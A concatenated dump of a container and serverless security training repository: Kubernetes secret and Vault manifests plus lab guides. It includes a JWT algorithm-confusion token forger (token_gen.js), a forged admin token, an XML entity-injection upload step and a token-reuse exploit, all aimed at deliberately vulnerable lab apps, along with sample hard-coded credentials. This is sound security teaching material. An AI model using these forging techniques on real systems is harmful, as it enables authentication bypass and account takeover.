kubectl create -f mysealedsecret.json 43 | ``` 44 | 45 | * Check the created Secret 46 | 47 | ```bash 48 | kubectl get 
secrets 49 | ``` 50 | 51 | 52 | ##### Step 6: 53 | 54 | * Delete the created sealed secret 55 | 56 | ```bash 57 | kubectl delete -f mysealedsecret.json 58 | ``` 59 | -------------------------------------------------------------------------------- /Kubernetes/VM/SealedSecrets/mysecret.json: -------------------------------------------------------------------------------- 1 | { 2 | "kind": "Secret", 3 | "apiVersion": "v1", 4 | "metadata": { 5 | "name": "mysecret", 6 | "creationTimestamp": null 7 | }, 8 | "data": { 9 | "mysql_pass": "bm9uZW9meW9iaXpuZXNzMTIz", 10 | "mysql_user": "cm9vdA==" 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/__init__.py -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/falco-event-generator-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: falco-event-generator-deployment 5 | labels: 6 | name: falco-event-generator-deployment 7 | app: demo 8 | spec: 9 | replicas: 1 10 | template: 11 | metadata: 12 | labels: 13 | app: falco-event-generator 14 | spec: 15 | containers: 16 | - name: falco-event-generator 17 | image: sysdig/falco-event-generator:latest 18 | 19 | -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-1.png 
-------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-2.png -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-3.png -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-4.png -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-5.png -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-6.png -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/img/sysdig-falco-7.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-7.png -------------------------------------------------------------------------------- /Kubernetes/VM/SysdigFalco/tornado_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import tornado.ioloop 4 | import tornado.web 5 | import pprint 6 | 7 | 8 | class MyDumpHandler(tornado.web.RequestHandler): 9 | def post(self): 10 | pprint.pprint(self.request) 11 | pprint.pprint(self.request.body) 12 | 13 | if __name__ == "__main__": 14 | tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090) 15 | tornado.ioloop.IOLoop.instance().start() 16 | 17 | -------------------------------------------------------------------------------- /Kubernetes/Vault/policy-kubernetes-vault.hcl: -------------------------------------------------------------------------------- 1 | path "intermediate-ca/issue/kubernetes-vault" { 2 | capabilities = ["update"] 3 | } 4 | 5 | path "auth/token/roles/kubernetes-vault" { 6 | capabilities = ["read"] 7 | } 8 | -------------------------------------------------------------------------------- /Kubernetes/Vault/policy-sample-app.hcl: -------------------------------------------------------------------------------- 1 | path "auth/approle/role/sample-app/secret-id" { 2 | capabilities = ["update"] 3 | } 4 | -------------------------------------------------------------------------------- /Kubernetes/Vault/sample-app.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions/v1beta1 2 | kind: Deployment 3 | metadata: 4 | name: sample-app 5 | spec: 6 | replicas: 2 7 | template: 8 | metadata: 9 | labels: 10 | app: sample-app 11 | annotations: 12 | pod.boostport.com/vault-approle: sample-app 13 | 
pod.boostport.com/vault-init-container: get-vault-token 14 | spec: 15 | containers: 16 | - name: sample-app 17 | image: boostport/kubernetes-vault-sample-app 18 | volumeMounts: 19 | - name: vault-token 20 | mountPath: /var/run/secrets/boostport.com 21 | initContainers: 22 | - name: get-vault-token 23 | image: boostport/kubernetes-vault-init 24 | imagePullPolicy: Always 25 | env: 26 | - name: VAULT_ROLE_ID 27 | value: Replace_with_$VAULT_ROLE_ID_Value_Here 28 | volumeMounts: 29 | - name: vault-token 30 | mountPath: /var/run/secrets/boostport.com 31 | volumes: 32 | - name: vault-token 33 | emptyDir: {} 34 | -------------------------------------------------------------------------------- /Kubernetes/Vault/vault.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: vault 5 | labels: 6 | app: vault 7 | spec: 8 | ports: 9 | - name: vault 10 | port: 8200 11 | selector: 12 | app: vault 13 | --- 14 | apiVersion: extensions/v1beta1 15 | kind: Deployment 16 | metadata: 17 | labels: 18 | app: vault 19 | name: vault 20 | spec: 21 | replicas: 1 22 | template: 23 | metadata: 24 | labels: 25 | app: vault 26 | spec: 27 | containers: 28 | - image: vault 29 | name: vault 30 | ports: 31 | - containerPort: 8200 32 | name: vaultport 33 | protocol: TCP 34 | securityContext: 35 | capabilities: 36 | add: 37 | - IPC_LOCK 38 | env: 39 | - name: VAULT_DEV_ROOT_TOKEN_ID 40 | value: vault-root-token -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # [Container Security, Orchestration and Serverless Training Manual](https://github.com/we45/container_training) 2 | 3 | ## Content 4 | 5 | 6 | 1. ##### [Containers](Container/README.md) 7 | 8 | 2. ##### [Kuberenetes](Kubernetes/README.md) 9 | 10 | 3. 
##### [Serverless](Serverless/README.md) 11 | 12 | 13 | ----- 14 | 15 | * ##### Brought to you by [we45](https://www.we45.com) 16 | 17 | ![](img/we45logo.jpg) 18 | 19 | 20 | #### Contact Us 21 | 22 | [![Twitter](img/twitter.png)](https://twitter.com/we45) 23 | [![Github](img/github.png)](https://github.com/we45) 24 | -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/Open-Terminal.png -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/img/click-local-storage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/click-local-storage.png -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/img/local-storage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/local-storage.png -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/img/login-page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/login-page.png -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/img/open-browser.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/open-browser.png -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/public_key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2fkx4Ee2DVFKLv0FvPAg 3 | QLzPEBqbxKg41+D118GH+sc/YOzD5R+4MlTuB5L+OL7vwjS3NrZvfV86n5ylMLMG 4 | I2lm34qKVnZu2dCExRSEx6aRD0Ql45j0DCx4nJWkujYuHyUpSTGdG8Al4nWxdmYn 5 | L8UJRDvWJdx7aiKElj1hm+X4pVCxDKLWyGp+rzaTolVq+eJ5XeogAwgyO53eoxak 6 | +DY4+63J6P7Qfxu8QXu4/tedR/vz597CJEi5YoMguV67cHTIfAV/N4IvhZhDdbmB 7 | lkftCHMnLJEkhCyew0gtcu9KciT/75f7xWVTC1a9+SaBumNfveyQJxcr/hhxjv5r 8 | KQIDAQAB 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/token.txt: -------------------------------------------------------------------------------- 1 | eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwic3RhdHVzIjoiaGFja2VkIiwiaWF0IjoxNTM5MDIyNzM4fQ.jGgc48P75ePUtISPCjdgo59Sq5QvwVncGW_EerzuI-Q 2 | -------------------------------------------------------------------------------- /Serverless/Algorithm-Confusion/token_gen.js: -------------------------------------------------------------------------------- 1 | const jwt = require("jsonwebtoken"); 2 | const fs = require("fs"); 3 | const colors = require("colors/safe"); 4 | if (process.argv.length < 5) { 5 | console.error("You need to provide --file and --username argument") 6 | } else { 7 | let key = fs.readFileSync(process.argv[3], "utf8"); 8 | let token = jwt.sign({ username: process.argv[5], status: "hacked" }, key, { 9 | algorithm: "HS256" 10 | }); 11 | console.log("\n") 12 | console.log(colors.green("This is your token: " + 
token)); 13 | } -------------------------------------------------------------------------------- /Serverless/Bandit/README.md: -------------------------------------------------------------------------------- 1 | # **`Bandit - Python Static-Application-Security-Testing`** 2 | 3 | 4 | Step 1: Navigate to the directory that has the project to be scanned 5 | 6 | ```bash 7 | cd /root 8 | ``` 9 | 10 | Step 2: Run `bandit -r -f json -o bandit_result.json DVFaaS-Damn-Vulnerable-Functions-as-a-Service/` to run a bandit scan and generate a `json` report. 11 | 12 | ![](img/bandit-2.png) 13 | 14 | 15 | Step 3: The report is generated and can be read 16 | 17 | ![](img/bandit-3.png) 18 | 19 | -------------------------------------------------------------------------------- /Serverless/Bandit/img/bandit-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Bandit/img/bandit-1.png -------------------------------------------------------------------------------- /Serverless/Bandit/img/bandit-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Bandit/img/bandit-2.png -------------------------------------------------------------------------------- /Serverless/Bandit/img/bandit-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Bandit/img/bandit-3.png -------------------------------------------------------------------------------- /Serverless/Deploy a Function/README.md: -------------------------------------------------------------------------------- 1 | ## Deploy a Serverless Function 2 | 3 | ##### Step 1: 4 | 5 | * Install pip3, if it is not installed 6 | 
7 | ```bash 8 | wget https://bootstrap.pypa.io/get-pip.py && python3 get-pip.py && rm get-pip.py 9 | ``` 10 | 11 | * Install `Chalice` 12 | 13 | ```bash 14 | pip3 install chalice 15 | ``` 16 | 17 | ##### Step 2: 18 | 19 | * Navigate to `DVFaaS` Directory 20 | 21 | ```bash 22 | cd /root/DVFaaS-Damn-Vulnerable-Functions-as-a-Service/ 23 | 24 | ls 25 | ``` 26 | 27 | * Navigate to Insecure Deserialization directory 28 | 29 | ```bash 30 | cd insecure_deserialization/insecure-deserialization 31 | ``` 32 | 33 | 34 | ##### Step 3: 35 | 36 | #### * IMPORTANT: Ensure that the AWS creds have been configured! 37 | 38 | 39 | * Set the necessary environment variables 40 | 41 | ```bash 42 | export LC_ALL=C.UTF-8 43 | 44 | export LANG=C.UTF-8 45 | ``` 46 | 47 | * Deploy the serverless function using `chalice` 48 | 49 | ```bash 50 | chalice deploy 51 | ``` 52 | 53 | ##### Step 3: 54 | 55 | * Delete the serverless function 56 | 57 | ```bash 58 | chalice delete 59 | ``` 60 | -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/README.md: -------------------------------------------------------------------------------- 1 | ## Event Injection S3 2 | 3 | ##### Step 1: 4 | * Open browser 5 | 6 | ![](img/open-browser.png) 7 | 8 | 9 | ##### Step 2: 10 | 11 | * open `http://sls-training-ui.s3-website-us-east-1.amazonaws.com/` to access the XML-Uploader application. 12 | 13 | ![](img/login-page.png) 14 | 15 | 16 | ##### Step 3: 17 | 18 | * Click Register icon to register on the application 19 | 20 | **Note:** Please enter required information and submit. 21 | 22 | ![](img/register-page.png) 23 | 24 | 25 | ##### Step 4: 26 | 27 | * Using `email` and `password` login to the application. 
28 | 29 | ![](img/login-page.png) 30 | 31 | ##### Step 5: 32 | 33 | * Once Logged in, click `Upload File` icon 34 | 35 | ![](img/click-upload-xml.png) 36 | 37 | ##### Step 6: 38 | 39 | * Upload-XML file view 40 | 41 | **Note:** Please upload a malicious XML file (https://github.com/we45/container_training/blob/master/Serverless/Event-Injection-S3/malicious-xml.xml) 42 | 43 | ![](img/upload-file-view.png) 44 | 45 | 46 | ##### Step 7: 47 | 48 | * Once the file has been uploaded, It will redirect to `/home/` . 49 | 50 | **Note:** Here will see all our uploaded Xml files. Please refresh the page if the file is not visible. 51 | 52 | ![](img/upload-file-view.png) 53 | 54 | ##### Step 8: 55 | 56 | * Click the file name on the left . 57 | 58 | ![](img/click-xml-file.png) 59 | 60 | ##### Step 9: 61 | 62 | * You will see that the exploitation has been successful. 63 | 64 | ![](img/exploited-info.png) 65 | 66 | -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/click-upload-xml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/click-upload-xml.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/click-xml-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/click-xml-file.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/exploited-info.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/exploited-info.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/login-page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/login-page.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/open-browser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/open-browser.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/register-page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/register-page.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/img/upload-file-view.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/upload-file-view.png -------------------------------------------------------------------------------- /Serverless/Event-Injection-S3/malicious-xml.xml: -------------------------------------------------------------------------------- 1 | 2 | ]> 3 | 4 | John 5 | &ent; 6 | -------------------------------------------------------------------------------- /Serverless/Initial-Setup/README.md: 
-------------------------------------------------------------------------------- 1 | # Steps to run before starting Labs 2 | 3 | ##### Step 1: 4 | 5 | * Update the Labs 6 | 7 | ```bash 8 | cd Serverless/Initial-Setup/ 9 | 10 | ./install_script.sh 11 | ``` 12 | -------------------------------------------------------------------------------- /Serverless/Initial-Setup/install_script.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | # Clone necessary repositories 4 | git clone https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service.git ~/DVFaaS-Damn-Vulnerable-Functions-as-a-Service 5 | git clone https://github.com/we45/Cut-The-Funds-NodeJS.git ~/Cut-The-Funds-NodeJS 6 | git clone https://github.com/we45/NodeJsScan.git ~/NodeJsScan 7 | git clone https://github.com/we45/serverless-training-apps.git ~/serverless-training-apps 8 | 9 | # Install Node 10 | curl -s https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add - 11 | echo 'deb https://deb.nodesource.com/node_10.x xenial main' > /etc/apt/sources.list.d/nodesource.list 12 | echo 'deb-src https://deb.nodesource.com/node_10.x xenial main' >> /etc/apt/sources.list.d/nodesource.list 13 | sleep 2 14 | apt update 15 | killall dpkg && dpkg --configure -a 16 | sleep 1 17 | apt install -y nodejs virtualenv 18 | 19 | # Install bandit, pipenv & awscli 20 | pip install bandit pipenv awscli 21 | 22 | export LC_ALL=en_US.UTF-8 23 | export LANG=en_US.UTF-8 24 | 25 | pip uninstall -y urllib3 && pip install urllib3==1.22 26 | 27 | # DVFaaS pipenv requirements 28 | cd /root/DVFaaS-Damn-Vulnerable-Functions-as-a-Service && pipenv --python /usr/bin/python3 install boto3 && cd ~/ 29 | 30 | echo "Done!" 
-------------------------------------------------------------------------------- /Serverless/NodeJsScan/README.md: -------------------------------------------------------------------------------- 1 | # **`NodeJsScan - NodeJS Static-Application-Security-Testing`** 2 | 3 | 4 | Step 1: Navigate to the NodeJsScan directory. 5 | 6 | ```bash 7 | cd /root/NodeJsScan 8 | ``` 9 | 10 | 11 | Step 2: Create a python-virtual environment 12 | 13 | ```bash 14 | virtualenv -p python2 venv 15 | 16 | ls 17 | ``` 18 | 19 | 20 | Step 3: Activate python-virtual environment and install the requirements. 21 | 22 | ```bash 23 | source venv/bin/activate 24 | 25 | pip install -r requirements.txt 26 | ``` 27 | 28 | 29 | Step 4: Run the scan against a directory containing NodeJS code and generate a `json` report. 30 | 31 | ```bash 32 | python cli.py -r report -d /root/serverless-training-apps/jwt_example/ 33 | ``` 34 | 35 | 36 | Step 5: The report is generated and can be read 37 | 38 | ```bash 39 | cat report.json 40 | ``` 41 | -------------------------------------------------------------------------------- /Serverless/NodeJsScan/img/nodejsscan-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-1.png -------------------------------------------------------------------------------- /Serverless/NodeJsScan/img/nodejsscan-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-2.png -------------------------------------------------------------------------------- /Serverless/NodeJsScan/img/nodejsscan-3.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-3.png -------------------------------------------------------------------------------- /Serverless/NodeJsScan/img/nodejsscan-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-4.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/README.md: -------------------------------------------------------------------------------- 1 | ## None-Unique Values 2 | 3 | ##### Step 1: 4 | 5 | * Open browser 6 | 7 | ![](img/open-browser.png) 8 | 9 | 10 | ##### Step 2: 11 | 12 | * open `http://sls-training-ui.s3-website-us-east-1.amazonaws.com/` to access the XML-Uploader application. 13 | **Note:** Login as 14 | ``` 15 | email: jr@widget.co 16 | password: Test@1234 17 | ``` 18 | * Username is `john` 19 | 20 | ![](img/login-page.png) 21 | 22 | 23 | ##### Step 3: 24 | 25 | * Click `Shift + f9` or right click on top of the browser and click on `Web Developer` to select the `Storage Inspect` tab. 26 | 27 | ![](img/local-storage.png) 28 | 29 | ##### Step 4: 30 | 31 | * Copy the `token` 32 | 33 | ![](img/copy-token.png) 34 | 35 | ##### Step 5: 36 | 37 | * Click on `protected` icon. 38 | 39 | ![](img/click-protected.png) 40 | 41 | ##### Step 6: 42 | 43 | * Follow the instructor . 44 | 45 | ##### Step 7: 46 | 47 | * Register new user with `john` username. 48 | 49 | ![](img/register-page.png) 50 | 51 | ##### Step 8: 52 | 53 | * Once the user registered don't login 54 | 55 | ##### Step 9: 56 | 57 | * Click `Shift + f9` or right click on top of the browser and click on `Web Developer` to select the `Storage Inspect` tab. 
58 | 59 | ![](img/local-storage.png) 60 | 61 | ##### Step 10: 62 | 63 | * Paste the `token` you copied earlier 64 | 65 | ![](img/paste-token.png) 66 | 67 | ##### Step 11: 68 | 69 | * Once the `token` is pasted, access the URL `http://sls-training-ui.s3-website-us-east-1.amazonaws.com/protected` 70 | 71 | ![](img/finalised.png) 72 | 73 | 74 | -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/Open-Terminal.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/click-protected.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/click-protected.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/copy-token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/copy-token.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/finalised.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/finalised.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/local-storage.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/local-storage.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/login-page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/login-page.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/open-browser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/open-browser.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/paste-token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/paste-token.png -------------------------------------------------------------------------------- /Serverless/Non-Unique-Value/img/register-page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/register-page.png -------------------------------------------------------------------------------- /Serverless/None-Signed-Token/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/Open-Terminal.png 
-------------------------------------------------------------------------------- /Serverless/None-Signed-Token/img/get_token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/get_token.png -------------------------------------------------------------------------------- /Serverless/None-Signed-Token/img/local-storage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/local-storage.png -------------------------------------------------------------------------------- /Serverless/None-Signed-Token/img/login-page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/login-page.png -------------------------------------------------------------------------------- /Serverless/None-Signed-Token/img/open-browser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/open-browser.png -------------------------------------------------------------------------------- /Serverless/None-Signed-Token/img/tamper-jwt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/None-Signed-Token/img/tamper-jwt.png -------------------------------------------------------------------------------- /Serverless/Npm-Audit/README.md: -------------------------------------------------------------------------------- 1 
| # **`NPM-Audit - NodeJS Source-Code-Analysis-Tool`** 2 | 3 | 4 | Step 1: Navigate to the directory (`~/Cut-The-Funds-NodeJS`) that contains the source code to be scanned. 5 | 6 | ![](img/npm-audit-1.png) 7 | 8 | 9 | Step 2: Run `npm audit --json >> npm_audit.json` to scan the project's dependencies and generate a JSON report (note that `>>` appends to `npm_audit.json`, so remove any existing copy first to keep the report valid JSON). The generated report can then be read. 10 | 11 | ![](img/npm-audit-2.png) 12 | -------------------------------------------------------------------------------- /Serverless/Npm-Audit/img/npm-audit-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Npm-Audit/img/npm-audit-1.png -------------------------------------------------------------------------------- /Serverless/Npm-Audit/img/npm-audit-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Npm-Audit/img/npm-audit-2.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/Open-Terminal.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/local-storage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/local-storage.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/login-page.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/login-page.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/network.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/network.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/open-browser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/open-browser.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/param.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/param.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/search-default-view.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/search-default-view.png -------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/search-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/search-icon.png 
-------------------------------------------------------------------------------- /Serverless/Permission-Flaw/img/search-values.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Permission-Flaw/img/search-values.png -------------------------------------------------------------------------------- /Serverless/README.md: -------------------------------------------------------------------------------- 1 | # [Serverless](README.md) 2 | 3 | ### Initial Setup 4 | 5 | * Update the labs 6 | 7 | ```bash 8 | cd container_training/Serverless/Initial-Setup/ 9 | 10 | ./install_script.sh 11 | ``` 12 | 13 | 14 | ##### Function Data Event Injection 15 | 16 | * [Event-Injection-S3](Event-Injection-S3/README.md) 17 | 18 | * [Server Side Template Injection](Server-Side-Template-Injection/README.md) 19 | 20 | 21 | ##### Broken Access Control 22 | 23 | * [None Signed Token](None-Signed-Token/README.md) 24 | 25 | * [Algorithm Confusion](Algorithm-Confusion/README.md) 26 | 27 | * [Non Unique Value](Non-Unique-Value/README.md) 28 | 29 | 30 | ##### IAM Function Privilege Management 31 | 32 | * [Permission Flaw](Permission-Flaw/README.md) 33 | 34 | 35 | ##### Static Application Security Testing 36 | 37 | * [Bandit](Bandit/README.md) 38 | 39 | * 